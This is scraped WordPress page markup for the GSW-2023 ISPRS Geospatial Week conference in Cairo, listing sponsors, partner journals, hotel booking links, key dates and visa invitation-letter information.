omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, 